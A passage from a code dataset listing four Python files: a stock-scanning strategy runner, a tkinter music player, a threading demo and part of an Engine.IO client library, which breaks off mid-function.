source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
algo_main.py
|
from tps import common, ohlc_file
import os, sys, re, time
import pandas
import datetime
#from collections import OrderedDict
from ib_quote import IbQuote
#from tabulate import tabulate
import matplotlib.pyplot as plt
g_fdrcfg = {
"type": "normal",
"name": "ib1d",
"start": "",
"end": "",
"path": "./cache/"
}
algo_inx_dct = {}
g_ohlc_dct = {}
g_rule={}
g_symbol_df=pandas.DataFrame()
g_algo_list=[]
g_fdr_name = ''
class AlgoInfo:
def __init__(self, filename, param, _feeder):
self.name = filename
self.param = param
self.file = filename
self.fdr = FeederInfo(_feeder)
pass
class FeederInfo:
def __init__(self, name):
self.name = name
self.start_time = None
self.end_time = None
pass
def __get_algo_instance(algo_info):
algo_file = algo_info.file
algo_param = algo_info.param
if algo_file not in algo_inx_dct:
mod = __import__('algo.'+algo_file, globals(), locals(), [algo_file])
if hasattr(mod, 'algo_init'):
algo_inx = mod.algo_init(algo_param)
algo_inx_dct[algo_file] = algo_inx
return algo_inx
return algo_inx_dct[algo_file]
def __init_algo_inx(algo_list):
"""
init each algo module once
"""
for agIn in algo_list:
agIn.inx = __get_algo_instance(agIn)
def __print_df(df):
#print(tabulate(df, tablefmt="pipe", headers="keys",showindex=False))
print('========================================================')
print('= total', len(df), 'selected')
print('========================================================')
print(df)
# ========================================================
def __strategy_init_ohlc():
__init_algo_inx(g_algo_list)
df = g_symbol_df
# use the first algo's feeder
#fdr = g_algo_list[0].fdr
if 'feeder' in g_rule:
g_fdrcfg = g_rule['feeder']
for index, row in df.iterrows():
symbol = row['symbol']
if symbol not in g_ohlc_dct:
ohlc = ohlc_file.OhlcFile.get_ohlc(g_fdrcfg['path'],row, g_fdr_name)
g_ohlc_dct[symbol] = ohlc
if ohlc.empty:
print(symbol, "ohlc is empty")
continue
#print(ohlc)
#print(g_ohlc_dct)
pass
def __strategy_run_algo(df):
last_date = ''
for algo_info in g_algo_list:
fdr = algo_info.fdr
algo_name = algo_info.name
algo_file = algo_info.file
algo_inx = algo_info.inx
algo_param = algo_info.param
#ohlc_dct = algo_info.ohlc_dct
print("run algo:", algo_name, ",feeder:", fdr.name, ",param:", algo_param)
for index, row in df.iterrows():
symbol = row['symbol']
ohlc = g_ohlc_dct[symbol]
if ohlc.empty:
print(symbol, "ohlc is empty")
continue
print("processing", symbol)
#print(ohlc)
#ind_dct = algo_inx.run_algo(g_ohlc_dct[symbol])
ind_dct = algo_inx.run_algo(ohlc)
# add px
ind_dct['px'] = ohlc['Close'].iloc[-1]
if ind_dct:
for cn in ind_dct:
df.loc[index, cn] = ind_dct[cn]
#print(ohlc)
if not last_date:
last_date = ohlc['Date'].iloc[-1]
df = __strategy_post_algo(df)
"""
select columns
"""
#print(g_rule)
if 'columns' in g_rule:
output_cols = g_rule['columns']
if not output_cols:
output_cols.extend(df.columns.values)
df = df[output_cols]
else:
output_cols = df.columns.values
df = df[output_cols]
ret = {}
ret['raw'] = df
#__print_df(df)
print("======= SCAN ===================================")
df = __strategy_scan(df)
__print_df(df)
ret['scan']=df
#print(ohlc)
# TODO ohlc.to_csv(r'ohlc.csv')
print("last date is", last_date)
run_model(df)
return ret
'''
from matplotlib import style
def plot_ohlc(ohlc):
ax = plt.gca()
ohlc.plot(ax=ax, kind='line')
plt.show()
'''
# deep learning, TODO
def run_model(df_algo):
if 'model' in g_rule:
models = g_rule['model']
else:
return
print("======= RUNNING MODEL===================================")
this_model = models[0]
model_file = this_model["name"]
mod = __import__('model.'+model_file, globals(), locals(), [model_file])
model_entry = mod.model
df_model = g_symbol_df.copy()[["symbol"]]
if 'ohlc_output' in this_model:
symbol_set = set(models[0]['ohlc_output'])
for index, row in df_model.iterrows():
symbol = row['symbol']
ohlc = g_ohlc_dct[symbol]
#print('model=',id(ohlc))
# Drop missing value
#ohlc.fillna(value=-99999, inplace=True)
#ohlc.is_copy = None
df1 = ohlc[['Date']+models[0]["input_cols"]].copy()
df1.dropna(inplace=True)
#print('==---------*****************^%%%%%%%%%%%%%++++++++++++++++')
ind_dct,dfpred = model_entry(symbol,df1,this_model)
#print(ohlc[-100:])
g_ohlc_dct[symbol] = ohlc
ind_dct['px'] = ohlc['Close'].iloc[-1]
if ind_dct:
for cn in ind_dct:
df_model.loc[index, cn] = ind_dct[cn]
if dfpred is not None and symbol in symbol_set:
print('========================= PREDICTION =========================================')
print(dfpred)
ax = plt.gca()
dfpred.plot(ax=ax, kind='line')
#plot_ohlc(dfpred)
#thread1 = threading.Thread(target = plot_ohlc, args = (dfpred,))
#thread1.start()
if hasattr(mod, 'model_post'):
mod.model_post(df_algo)
# sort
if 'sort' in models[0]:
sort_list = models[0]['sort']
if sort_list:
sort_cols=[]
asc_list=[]
for dct in sort_list:
for key,value in dct.items():
sort_cols.append(key)
asc_list.append(False if value=="False" else True)
df_model.sort_values(by=sort_cols, inplace=True, ascending=asc_list)
pass
print(tabulate(df_model, tablefmt="pipe", headers="keys",showindex=False))
print(df_model.describe())
plt.show()
#print(df)
def __strategy_post_algo(df):
for algo_info in g_algo_list:
fdr = algo_info.fdr
algo_name = algo_info.name
algo_file = algo_info.file
algo_inx = algo_info.inx
algo_param = algo_info.param
#ohlc_dct = algo_info.ohlc_dct
print("run post algo:", algo_name, ",feeder:", fdr.name, ",param:", algo_param)
df = algo_inx.post_algo(df, g_ohlc_dct)
return df
# scan and pick columns
def __strategy_scan(df):
if 'criteria' in g_rule:
criteria = g_rule['criteria']
else:
criteria = []
collst = []
if not criteria:
print("criteria is empty,...take the original table")
else:
# filter by dynamic criteria string
crstr = ""
pattern1 = "([a-zA-Z][A-Za-z0-9-_]*)"
pattern2 = "[></]"
for cr in criteria:
print("processing cr", cr)
if cr[0] == '@': # TODO handle parameter
continue
collst = re.findall(pattern1, cr) # find all related columns
ration = re.findall(pattern2, cr)
if len(ration) != 0:
cr0 = re.sub(pattern1, r"df['\1']", cr) # put df[] surround pattern / substitute
if crstr == "": # first criteria
crstr = crstr + "(" + cr0 + ") "
else:
crstr = crstr + "& (" + cr0 + ") "
print("\tto evaluate criteria(logical) = %s" % crstr)
if crstr != "":
df = df[eval(crstr)]
# ===========================================================
#print(g_rule)
if 'columns' in g_rule:
output_cols = g_rule['columns']
if not output_cols:
output_cols.extend(df.columns.values)
#print('===========================================',output_set)
for col in collst:
if col not in output_cols: # keep origin order
output_cols.append(col)
df = df[output_cols]
if 'sort' in g_rule:
sort_list = g_rule['sort']
if sort_list:
sort_cols=[]
asc_list=[]
for dct in sort_list:
for key,value in dct.items():
sort_cols.append(key)
asc_list.append(False if value=="False" else True)
df.sort_values(by=sort_cols, inplace=True, ascending=asc_list)
pass
return df
def __merge_rt(ohlc_today):
for symbol, ohlc in ohlc_dct:
ts = ohlc.index[-1].to_datetime()
newt = ts + datetime.timedelta(days=1) # get today timestamp
ohlc.loc[newt] = {
'Open': ohlc_today['Open'],
'Close': ohlc_today['Close'],
'High': ohlc_today['High'],
'Low': ohlc_today['Low'],
'Volume': ohlc_today['Volume'],
'Adj Close': ohlc_today['Close']
}
"""
scan routine, strategy is algo_list which is consist of many algo,
this function will run each algo then merge their result into one table.
"""
def run_strategy():
df = g_symbol_df.copy()
print('run_strategy',df)
__strategy_init_ohlc()
# parse feeder -----------------------------
fdrcfg = {'type':'normal'}
#print(g_rule)
if 'feeder' in g_rule:
fdrcfg = g_rule['feeder']
if fdrcfg['type']=='realtime':
ibquote = IbQuote()
ibquote.get_quote_batch(g_symbol_df)
while True:
if not ibquote.ready():
time.sleep(5)
continue
else: #merge hist and live data
__merge_rt(ibquote.ohlc_dct)
__strategy_run_algo(df)
pass
else: #not realtime
return __strategy_run_algo(df)
pass
"""
import argparse
# help flag provides flag help
# store_true actions stores argument as True
parser = argparse.ArgumentParser()
parser.add_argument('-f', '--file', type=str, default='./config/trend.json', help="config file")
args = parser.parse_args()
"""
def get_feeder_name():
if 'feeder' in g_rule and 'name' in g_rule['feeder']:
fdrname = g_rule['feeder']['name'].upper()
else:
fdrname = 'IB1D'
if fdrname in ['IB1D','IB1H','IB1D5Y']:
return fdrname
else:
return 'IB1D'
def main(rule,symbolfn='./symbol_ib.txt'):
global g_symbol_df,g_rule,g_fdr_name
g_rule = rule
g_symbol_df = common.load_symbol_csv(symbolfn)
#feeder = 'IB1D'
g_fdr_name = get_feeder_name()
for algo_dct in g_rule['algo']:
#param is dict
#algo_param = dict.fromkeys(dct['param'], 1)
g_algo_list.append(AlgoInfo(algo_dct['name'],algo_dct['param'],g_fdr_name))
if not g_symbol_df.empty:
return run_strategy()
else:
print("usage: prog -f symbol_file -s symbol_lst -a algo -p algo_param -d feeder")
return {}
pass
#main(None)
|
main.py
|
import os
from tkinter import *
import tkinter.messagebox
from tkinter import filedialog
import time
import threading
from tkinter import ttk
from ttkthemes import themed_tk as tk
from pygame import mixer
from mutagen.mp3 import MP3
root = tk.ThemedTk()
root.get_themes()
root.set_theme("radiance")
# Menubar
menubar = Menu(root)
root.config(menu=menubar)
# The sub-menu
submenu = Menu(menubar, tearoff=0)
root.title("Juke Box")
root.iconbitmap(r'images/melody.ico')
# root.geometry('400x400')
# Status bar
statusbar = ttk.Label(root, text="Welcome to Juke Box", relief=SUNKEN, anchor=W, font='Times 12 bold')
statusbar.pack(side=BOTTOM, fill=X)
leftftrame = Frame(root)
leftftrame.pack(side=LEFT, padx=20)
playlistbox = Listbox(leftftrame)
playlistbox.pack()
playlist = [] # Array that contains full path + filename
def browse_file():
global filename_path
filename_path = filedialog.askopenfilename()
add_to_playlist(filename_path)
def add_to_playlist(filename):
filename = os.path.basename(filename)
index = 0
playlistbox.insert(index, filename)
playlist.insert(index, filename_path)
index += 1
addBtn = ttk.Button(leftftrame, text=' + Add', command=browse_file)
addBtn.pack(side=LEFT)
def del_song():
try:
selected_song = playlistbox.curselection()
selected_song = int(selected_song[0]) # Type-casting to int, otherwise it returns a tuple
playlistbox.delete(selected_song)
playlist.pop(selected_song)
except:
tkinter.messagebox.showerror('Juke Box', "Please select a song & then press -Del")
delBtn = ttk.Button(leftftrame, text=' - Del', command=del_song)
delBtn.pack(side=LEFT)
rightframe = Frame(root)
rightframe.pack()
topframe = Frame(rightframe)
topframe.pack()
lengthlabel = ttk.Label(topframe, text="Total Time : --:--")
lengthlabel.pack(pady=5)
currenttimelabel = ttk.Label(topframe, text="Current Time : --:--", relief=GROOVE)
currenttimelabel.pack(pady=5)
mixer.init() # initializing the mixer
menubar.add_cascade(label="File", menu=submenu)
submenu.add_command(label="Open", command=browse_file)
submenu.add_command(label="Exit", command=root.destroy)
def about_us():
tkinter.messagebox.showinfo('About Juke Box',
"Our very own Music Player \nSupports .mp3 and .wav files \nCopyright @gauravsarkar97")
submenu = Menu(menubar, tearoff=0)
menubar.add_cascade(label="Help", menu=submenu)
submenu.add_command(label="About Us", command=about_us)
def show_details(play_song):
file_data = os.path.splitext(play_song)
if file_data[1] == '.mp3':
audio = MP3(play_song)
total_length = audio.info.length
else:
a = mixer.Sound(play_song)
total_length = a.get_length()
min, sec = divmod(total_length, 60)
min = round(min)
sec = round(sec)
timeformat = '{:02d}:{:02d}'.format(min, sec)
lengthlabel['text'] = "Total Length : " + timeformat
t1 = threading.Thread(target=start_count, args=(total_length,))
t1.start()
def start_count(t):
global paused
while t and mixer.music.get_busy():
if paused:
continue
else:
min, sec = divmod(t, 60)
min = round(min)
sec = round(sec)
timeformat = '{:02d}:{:02d}'.format(min, sec)
currenttimelabel['text'] = "Current Time : " + timeformat
time.sleep(1)
t -= 1
def play_music():
global paused
if paused:
mixer.music.unpause()
statusbar['text'] = "Music Resumed"
paused = FALSE
else:
try:
stop_music()
time.sleep(1)
selected_song = playlistbox.curselection()
selected_song = int(selected_song[0]) # Type-casting to int, otherwise it returns a tuple
play_it = playlist[selected_song] # Getting the full path of the selected song
mixer.music.load(play_it)
mixer.music.play()
statusbar['text'] = "Playing Music : " + os.path.basename(play_it)
show_details(play_it)
except:
tkinter.messagebox.showerror('Juke Box', "No song(s) selected.\nPlease Open & select songs")
def stop_music():
mixer.music.stop()
statusbar['text'] = "Music Stopped"
paused = FALSE
def pause_music():
global paused
paused = TRUE
mixer.music.pause()
statusbar['text'] = "Music Paused"
def rewind_music():
play_music()
statusbar['text'] = "Music Rewinded"
def set_vol(val):
volume = float(val) / 100
mixer.music.set_volume(volume)
muted = FALSE
def mute_music(): # Mute & Unmute Functionality
global muted
if muted:
muted = FALSE
volumeBtn.configure(image=volumePhoto)
mixer.music.set_volume(0.5)
scale.set(50)
statusbar['text'] = "Music Unmuted"
else:
muted = TRUE
volumeBtn.configure(image=mutePhoto)
mixer.music.set_volume(0)
scale.set(0)
statusbar['text'] = "Music Muted"
# Adding a midle frame
middleframe = Frame(rightframe)
middleframe.pack(pady=20, padx=5)
# Buttons
playPhoto = PhotoImage(file='images/play.png')
playBtn = ttk.Button(middleframe, image=playPhoto, command=play_music) # play button
playBtn.grid(row=0, column=0, padx=10)
pausePhoto = PhotoImage(file='images/pause.png')
pauseBtn = ttk.Button(middleframe, image=pausePhoto, command=pause_music) # pause button
pauseBtn.grid(row=0, column=1, padx=10)
stopPhoto = PhotoImage(file='images/stop.png')
stopBtn = ttk.Button(middleframe, image=stopPhoto, command=stop_music) # stop button
stopBtn.grid(row=0, column=2, padx=10)
# Adding a bottom frame
bottomframe = Frame(rightframe)
bottomframe.pack(pady=30, padx=30)
rewindPhoto = PhotoImage(file='images/rewind.png')
rewindBtn = ttk.Button(bottomframe, image=rewindPhoto, command=rewind_music) # Rewind button
rewindBtn.grid(row=0, column=0, pady=10)
volumePhoto = PhotoImage(file='images/speaker.png')
mutePhoto = PhotoImage(file='images/mute.png')
volumeBtn = ttk.Button(bottomframe, image=volumePhoto, command=mute_music) # Rewind button
volumeBtn.grid(row=0, column=1, pady=10, padx=30)
# Volume Scale
scale = ttk.Scale(bottomframe, from_=0, to_=100, orient=HORIZONTAL, command=set_vol)
scale.set(50) # setting default value
mixer.music.set_volume(0.5)
scale.grid(row=0, column=2, pady=10)
def on_closing():
stop_music()
root.destroy()
root.protocol("WM_DELETE_WINDOW", on_closing) # Override close button
root.mainloop()
|
multithread_demo.py
|
__filename__ = 'multithread_demo.py'
__author__ = 'jwestover@sonobi.com'
import threading
import time
import random
class HelloWorld(object):
def __init__(self):
self.my_number = 1
self.lock = threading.Lock()
def thread_target1(self, parameter = None):
if parameter:
print '{0} this parameter has been passed'.format(str(parameter))
try:
time.sleep(parameter)
print 'Wake up time'
except:
#who cares
pass
else:
print 'hello world.... this is stupid'
return 'More stupid stuff'
def thread_target2(self, parameter = None):
time.sleep(.1*random.randint(0,10))
self.my_number += 1
time.sleep(float(parameter))
self.my_number += 1
print self.my_number
def thread_target3(self, parameter = None):
time.sleep(.1*random.randint(0,10))
self.lock.acquire()
self.my_number += 1
self.lock.release()
time.sleep(float(parameter))
self.lock.acquire()
self.my_number += 1
self.lock.release()
print self.my_number
def demo1(self):
for i in range(10):
this_thread = threading.Thread(target = self.thread_target1, args = (i,)).start()
print 'Thread count: {0}'.format(threading.active_count())
#This should return something
print this_thread
def demo2(self):
for i in range(10):
this_thread = threading.Thread(target = self.thread_target1, args = (i,))
this_thread.daemon = True
this_thread.start()
print 'Thread count: {0}'.format(threading.active_count())
time.sleep(60)
def demo3(self):
for i in range(10):
this_thread = threading.Thread(target = self.thread_target2, args = (i,))
this_thread.daemon = False
this_thread.start()
print 'Thread count: {0} My Number: {1}'.format(threading.active_count(), self.my_number)
def demo4(self):
for i in range(10):
this_thread = threading.Thread(target = self.thread_target3, args = (i,))
this_thread.daemon = False
this_thread.start()
print 'Thread count: {0} My Number: {1}'.format(threading.active_count(), self.my_number)
test = HelloWorld()
#test.demo1()
#test.demo2()
#test.demo3()
#test.demo4()
|
client.py
|
from base64 import b64encode
from engineio.json import JSONDecodeError
import logging
import queue
import signal
import ssl
import threading
import time
import urllib
try:
import requests
except ImportError: # pragma: no cover
requests = None
try:
import websocket
except ImportError: # pragma: no cover
websocket = None
from . import exceptions
from . import packet
from . import payload
default_logger = logging.getLogger('engineio.client')
connected_clients = []
def signal_handler(sig, frame):
"""SIGINT handler.
Disconnect all active clients and then invoke the original signal handler.
"""
for client in connected_clients[:]:
if not client.is_asyncio_based():
client.disconnect()
if callable(original_signal_handler):
return original_signal_handler(sig, frame)
else: # pragma: no cover
# Handle case where no original SIGINT handler was present.
return signal.default_int_handler(sig, frame)
original_signal_handler = None
class Client(object):
"""An Engine.IO client.
This class implements a fully compliant Engine.IO web client with support
for websocket and long-polling transports.
:param logger: To enable logging set to ``True`` or pass a logger object to
use. To disable logging set to ``False``. The default is
``False``. Note that fatal errors are logged even when
``logger`` is ``False``.
:param json: An alternative json module to use for encoding and decoding
packets. Custom json modules must have ``dumps`` and ``loads``
functions that are compatible with the standard library
versions.
:param request_timeout: A timeout in seconds for requests. The default is
5 seconds.
:param http_session: an initialized ``requests.Session`` object to be used
when sending requests to the server. Use it if you
need to add special client options such as proxy
servers, SSL certificates, custom CA bundle, etc.
:param ssl_verify: ``True`` to verify SSL certificates, or ``False`` to
skip SSL certificate verification, allowing
connections to servers with self signed certificates.
The default is ``True``.
"""
event_names = ['connect', 'disconnect', 'message']
def __init__(self,
logger=False,
json=None,
request_timeout=5,
http_session=None,
ssl_verify=True):
global original_signal_handler
if original_signal_handler is None and \
threading.current_thread() == threading.main_thread():
original_signal_handler = signal.signal(signal.SIGINT,
signal_handler)
self.handlers = {}
self.base_url = None
self.transports = None
self.current_transport = None
self.sid = None
self.upgrades = None
self.ping_interval = None
self.ping_timeout = None
self.http = http_session
self.ws = None
self.read_loop_task = None
self.write_loop_task = None
self.queue = None
self.state = 'disconnected'
self.ssl_verify = ssl_verify
if json is not None:
packet.Packet.json = json
if not isinstance(logger, bool):
self.logger = logger
else:
self.logger = default_logger
if self.logger.level == logging.NOTSET:
if logger:
self.logger.setLevel(logging.INFO)
else:
self.logger.setLevel(logging.ERROR)
self.logger.addHandler(logging.StreamHandler())
self.request_timeout = request_timeout
def is_asyncio_based(self):
return False
def on(self, event, handler=None):
"""Register an event handler.
:param event: The event name. Can be ``'connect'``, ``'message'`` or
``'disconnect'``.
:param handler: The function that should be invoked to handle the
event. When this parameter is not given, the method
acts as a decorator for the handler function.
Example usage::
# as a decorator:
@eio.on('connect')
def connect_handler():
print('Connection request')
# as a method:
def message_handler(msg):
print('Received message: ', msg)
eio.send('response')
eio.on('message', message_handler)
"""
if event not in self.event_names:
raise ValueError('Invalid event')
def set_handler(handler):
self.handlers[event] = handler
return handler
if handler is None:
return set_handler
set_handler(handler)
def connect(self, url, headers=None, transports=None,
engineio_path='engine.io'):
"""Connect to an Engine.IO server.
:param url: The URL of the Engine.IO server. It can include custom
query string parameters if required by the server.
:param headers: A dictionary with custom headers to send with the
connection request.
:param transports: The list of allowed transports. Valid transports
are ``'polling'`` and ``'websocket'``. If not
given, the polling transport is connected first,
then an upgrade to websocket is attempted.
:param engineio_path: The endpoint where the Engine.IO server is
installed. The default value is appropriate for
most cases.
Example usage::
eio = engineio.Client()
eio.connect('http://localhost:5000')
"""
if self.state != 'disconnected':
raise ValueError('Client is not in a disconnected state')
valid_transports = ['polling', 'websocket']
if transports is not None:
if isinstance(transports, str):
transports = [transports]
transports = [transport for transport in transports
if transport in valid_transports]
if not transports:
raise ValueError('No valid transports provided')
self.transports = transports or valid_transports
self.queue = self.create_queue()
return getattr(self, '_connect_' + self.transports[0])(
url, headers or {}, engineio_path)
def wait(self):
"""Wait until the connection with the server ends.
Client applications can use this function to block the main thread
during the life of the connection.
"""
if self.read_loop_task:
self.read_loop_task.join()
def send(self, data):
"""Send a message to a client.
:param data: The data to send to the client. Data can be of type
``str``, ``bytes``, ``list`` or ``dict``. If a ``list``
or ``dict``, the data will be serialized as JSON.
"""
self._send_packet(packet.Packet(packet.MESSAGE, data=data))
def disconnect(self, abort=False):
"""Disconnect from the server.
:param abort: If set to ``True``, do not wait for background tasks
associated with the connection to end.
"""
if self.state == 'connected':
self._send_packet(packet.Packet(packet.CLOSE))
self.queue.put(None)
self.state = 'disconnecting'
self._trigger_event('disconnect', run_async=False)
if self.current_transport == 'websocket':
self.ws.close()
if not abort:
self.read_loop_task.join()
self.state = 'disconnected'
try:
connected_clients.remove(self)
except ValueError: # pragma: no cover
pass
self._reset()
def transport(self):
"""Return the name of the transport currently in use.
The possible values returned by this function are ``'polling'`` and
``'websocket'``.
"""
return self.current_transport
def start_background_task(self, target, *args, **kwargs):
"""Start a background task.
This is a utility function that applications can use to start a
background task.
:param target: the target function to execute.
:param args: arguments to pass to the function.
:param kwargs: keyword arguments to pass to the function.
This function returns an object that represents the background task,
on which the ``join()`` method can be invoked to wait for the task to
complete.
"""
th = threading.Thread(target=target, args=args, kwargs=kwargs)
th.start()
return th
def sleep(self, seconds=0):
"""Sleep for the requested amount of time."""
return time.sleep(seconds)
def create_queue(self, *args, **kwargs):
"""Create a queue object."""
q = queue.Queue(*args, **kwargs)
q.Empty = queue.Empty
return q
def create_event(self, *args, **kwargs):
"""Create an event object."""
return threading.Event(*args, **kwargs)
def _reset(self):
self.state = 'disconnected'
self.sid = None
def _connect_polling(self, url, headers, engineio_path):
"""Establish a long-polling connection to the Engine.IO server."""
if requests is None: # pragma: no cover
# not installed
self.logger.error('requests package is not installed -- cannot '
'send HTTP requests!')
return
self.base_url = self._get_engineio_url(url, engineio_path, 'polling')
self.logger.info('Attempting polling connection to ' + self.base_url)
r = self._send_request(
'GET', self.base_url + self._get_url_timestamp(), headers=headers,
timeout=self.request_timeout)
if r is None or isinstance(r, str):
self._reset()
raise exceptions.ConnectionError(
r or 'Connection refused by the server')
if r.status_code < 200 or r.status_code >= 300:
self._reset()
try:
arg = r.json()
except JSONDecodeError:
arg = None
raise exceptions.ConnectionError(
'Unexpected status code {} in server response'.format(
r.status_code), arg)
try:
p = payload.Payload(encoded_payload=r.content.decode('utf-8'))
except ValueError:
raise exceptions.ConnectionError(
'Unexpected response from server') from None
open_packet = p.packets[0]
if open_packet.packet_type != packet.OPEN:
raise exceptions.ConnectionError(
'OPEN packet not returned by server')
self.logger.info(
'Polling connection accepted with ' + str(open_packet.data))
self.sid = open_packet.data['sid']
self.upgrades = open_packet.data['upgrades']
self.ping_interval = int(open_packet.data['pingInterval']) / 1000.0
self.ping_timeout = int(open_packet.data['pingTimeout']) / 1000.0
self.current_transport = 'polling'
self.base_url += '&sid=' + self.sid
self.state = 'connected'
connected_clients.append(self)
self._trigger_event('connect', run_async=False)
for pkt in p.packets[1:]:
self._receive_packet(pkt)
if 'websocket' in self.upgrades and 'websocket' in self.transports:
# attempt to upgrade to websocket
if self._connect_websocket(url, headers, engineio_path):
# upgrade to websocket succeeded, we're done here
return
# start background tasks associated with this client
self.write_loop_task = self.start_background_task(self._write_loop)
self.read_loop_task = self.start_background_task(
self._read_loop_polling)
def _connect_websocket(self, url, headers, engineio_path):
"""Establish or upgrade to a WebSocket connection with the server."""
if websocket is None: # pragma: no cover
# not installed
self.logger.error('websocket-client package not installed, only '
'polling transport is available')
return False
websocket_url = self._get_engineio_url(url, engineio_path, 'websocket')
if self.sid:
self.logger.info(
'Attempting WebSocket upgrade to ' + websocket_url)
upgrade = True
websocket_url += '&sid=' + self.sid
else:
upgrade = False
self.base_url = websocket_url
self.logger.info(
'Attempting WebSocket connection to ' + websocket_url)
# get cookies and other settings from the long-polling connection
# so that they are preserved when connecting to the WebSocket route
cookies = None
extra_options = {}
if self.http:
# cookies
cookies = '; '.join(["{}={}".format(cookie.name, cookie.value)
for cookie in self.http.cookies])
for header, value in headers.items():
if header.lower() == 'cookie':
if cookies:
cookies += '; '
cookies += value
del headers[header]
break
# auth
if 'Authorization' not in headers and self.http.auth is not None:
if not isinstance(self.http.auth, tuple): # pragma: no cover
raise ValueError('Only basic authentication is supported')
basic_auth = '{}:{}'.format(
self.http.auth[0], self.http.auth[1]).encode('utf-8')
basic_auth = b64encode(basic_auth).decode('utf-8')
headers['Authorization'] = 'Basic ' + basic_auth
# cert
# this can be given as ('certfile', 'keyfile') or just 'certfile'
if isinstance(self.http.cert, tuple):
extra_options['sslopt'] = {
'certfile': self.http.cert[0],
'keyfile': self.http.cert[1]}
elif self.http.cert:
extra_options['sslopt'] = {'certfile': self.http.cert}
# proxies
if self.http.proxies:
proxy_url = None
if websocket_url.startswith('ws://'):
proxy_url = self.http.proxies.get(
'ws', self.http.proxies.get('http'))
else: # wss://
proxy_url = self.http.proxies.get(
'wss', self.http.proxies.get('https'))
if proxy_url:
parsed_url = urllib.parse.urlparse(
proxy_url if '://' in proxy_url
else 'scheme://' + proxy_url)
extra_options['http_proxy_host'] = parsed_url.hostname
extra_options['http_proxy_port'] = parsed_url.port
extra_options['http_proxy_auth'] = (
(parsed_url.username, parsed_url.password)
if parsed_url.username or parsed_url.password
else None)
# verify
if isinstance(self.http.verify, str):
if 'sslopt' in extra_options:
extra_options['sslopt']['ca_certs'] = self.http.verify
else:
extra_options['sslopt'] = {'ca_certs': self.http.verify}
elif not self.http.verify:
self.ssl_verify = False
if not self.ssl_verify:
extra_options['sslopt'] = {"cert_reqs": ssl.CERT_NONE}
try:
ws = websocket.create_connection(
websocket_url + self._get_url_timestamp(), header=headers,
cookie=cookies, enable_multithread=True, **extra_options)
except (ConnectionError, IOError, websocket.WebSocketException):
if upgrade:
self.logger.warning(
'WebSocket upgrade failed: connection error')
return False
else:
raise exceptions.ConnectionError('Connection error')
if upgrade:
p = packet.Packet(packet.PING, data='probe').encode()
try:
ws.send(p)
except Exception as e: # pragma: no cover
self.logger.warning(
'WebSocket upgrade failed: unexpected send exception: %s',
str(e))
return False
try:
p = ws.recv()
except Exception as e: # pragma: no cover
self.logger.warning(
'WebSocket upgrade failed: unexpected recv exception: %s',
str(e))
return False
pkt = packet.Packet(encoded_packet=p)
if pkt.packet_type != packet.PONG or pkt.data != 'probe':
self.logger.warning(
'WebSocket upgrade failed: no PONG packet')
return False
p = packet.Packet(packet.UPGRADE).encode()
try:
ws.send(p)
except Exception as e: # pragma: no cover
self.logger.warning(
'WebSocket upgrade failed: unexpected send exception: %s',
str(e))
return False
self.current_transport = 'websocket'
self.logger.info('WebSocket upgrade was successful')
else:
try:
p = ws.recv()
except Exception as e: # pragma: no cover
raise exceptions.ConnectionError(
'Unexpected recv exception: ' + str(e))
open_packet = packet.Packet(encoded_packet=p)
if open_packet.packet_type != packet.OPEN:
raise exceptions.ConnectionError('no OPEN packet')
self.logger.info(
'WebSocket connection accepted with ' + str(open_packet.data))
self.sid = open_packet.data['sid']
self.upgrades = open_packet.data['upgrades']
self.ping_interval = int(open_packet.data['pingInterval']) / 1000.0
self.ping_timeout = int(open_packet.data['pingTimeout']) / 1000.0
self.current_transport = 'websocket'
self.state = 'connected'
connected_clients.append(self)
self._trigger_event('connect', run_async=False)
self.ws = ws
self.ws.settimeout(self.ping_interval + self.ping_timeout)
# start background tasks associated with this client
self.write_loop_task = self.start_background_task(self._write_loop)
self.read_loop_task = self.start_background_task(
self._read_loop_websocket)
return True
def _receive_packet(self, pkt):
"""Handle incoming packets from the server."""
packet_name = packet.packet_names[pkt.packet_type] \
if pkt.packet_type < len(packet.packet_names) else 'UNKNOWN'
self.logger.info(
'Received packet %s data %s', packet_name,
pkt.data if not isinstance(pkt.data, bytes) else '<binary>')
if pkt.packet_type == packet.MESSAGE:
self._trigger_event('message', pkt.data, run_async=True)
elif pkt.packet_type == packet.PING:
self._send_packet(packet.Packet(packet.PONG, pkt.data))
elif pkt.packet_type == packet.CLOSE:
self.disconnect(abort=True)
elif pkt.packet_type == packet.NOOP:
pass
else:
self.logger.error('Received unexpected packet of type %s',
pkt.packet_type)
def _send_packet(self, pkt):
"""Queue a packet to be sent to the server."""
if self.state != 'connected':
return
self.queue.put(pkt)
self.logger.info(
'Sending packet %s data %s',
packet.packet_names[pkt.packet_type],
pkt.data if not isinstance(pkt.data, bytes) else '<binary>')
def _send_request(
self, method, url, headers=None, body=None,
timeout=None): # pragma: no cover
if self.http is None:
self.http = requests.Session()
if not self.ssl_verify:
self.http.verify = False
try:
return self.http.request(method, url, headers=headers, data=body,
timeout=timeout)
except requests.exceptions.RequestException as exc:
self.logger.info('HTTP %s request to %s failed with error %s.',
method, url, exc)
return str(exc)
def _trigger_event(self, event, *args, **kwargs):
"""Invoke an event handler."""
run_async = kwargs.pop('run_async', False)
if event in self.handlers:
if run_async:
return self.start_background_task(self.handlers[event], *args)
else:
try:
return self.handlers[event](*args)
except:
self.logger.exception(event + ' handler error')
def _get_engineio_url(self, url, engineio_path, transport):
"""Generate the Engine.IO connection URL."""
engineio_path = engineio_path.strip('/')
parsed_url = urllib.parse.urlparse(url)
if transport == 'polling':
scheme = 'http'
elif transport == 'websocket':
scheme = 'ws'
else: # pragma: no cover
raise ValueError('invalid transport')
if parsed_url.scheme in ['https', 'wss']:
scheme += 's'
return ('{scheme}://{netloc}/{path}/?{query}'
'{sep}transport={transport}&EIO=4').format(
scheme=scheme, netloc=parsed_url.netloc,
path=engineio_path, query=parsed_url.query,
sep='&' if parsed_url.query else '',
transport=transport)
def _get_url_timestamp(self):
"""Generate the Engine.IO query string timestamp."""
return '&t=' + str(time.time())
def _read_loop_polling(self):
"""Read packets by polling the Engine.IO server."""
while self.state == 'connected':
self.logger.info(
'Sending polling GET request to ' + self.base_url)
r = self._send_request(
'GET', self.base_url + self._get_url_timestamp(),
timeout=max(self.ping_interval, self.ping_timeout) + 5)
if r is None or isinstance(r, str):
self.logger.warning(
r or 'Connection refused by the server, aborting')
self.queue.put(None)
break
if r.status_code < 200 or r.status_code >= 300:
self.logger.warning('Unexpected status code %s in server '
'response, aborting', r.status_code)
self.queue.put(None)
break
try:
